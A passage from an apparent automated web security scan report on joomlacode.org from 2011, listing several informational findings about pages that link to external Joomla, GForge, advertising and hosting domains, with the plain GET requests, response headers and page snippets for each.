...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum & Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.77. http://joomlacode.org/gf/account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/account/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/account/?action=LostPassword

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/account/?action=LostPassword HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.78. http://joomlacode.org/gf/project/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/?action=ProjectTroveBrowse&_trove_category_id=318

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/?action=ProjectTroveBrowse&_trove_category_id=318 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:26:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.79. http://joomlacode.org/gf/project/com_joodater/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/com_joodater/news/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/com_joodater/news/?action=NewsThreadView&id=3280

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-news
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/com_joodater/news/?action=NewsThreadView&id=3280 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:30:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.80. http://joomlacode.org/gf/project/feedgator/frs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/frs/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/feedgator/frs/?action=FrsReleaseView&release_id=14013

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-frs
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/feedgator/frs/?action=FrsReleaseView&release_id=14013 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:36:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-frs" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.81. http://joomlacode.org/gf/project/feedgator/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/news/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/feedgator/news/?action=NewsThreadView&id=3279

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-news
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/feedgator/news/?action=NewsThreadView&id=3279 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.82. http://joomlacode.org/gf/project/imgttfmenu/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/imgttfmenu/news/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/imgttfmenu/news/?action=NewsThreadView&id=3281

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-news
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/imgttfmenu/news/?action=NewsThreadView&id=3281 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:28:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-news" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.83. http://joomlacode.org/gf/project/joomla/frs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/frs/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-frs
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=project-frs" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<div class="rochenleft">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode_leftcol.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.84. http://joomlacode.org/gf/project/joomla/reporting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/reporting/

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/project/joomla/reporting/?action=Activity

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://forum.joomla.org/
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=project-reporting
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/

Request

GET /gf/project/joomla/reporting/?action=Activity HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:21:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
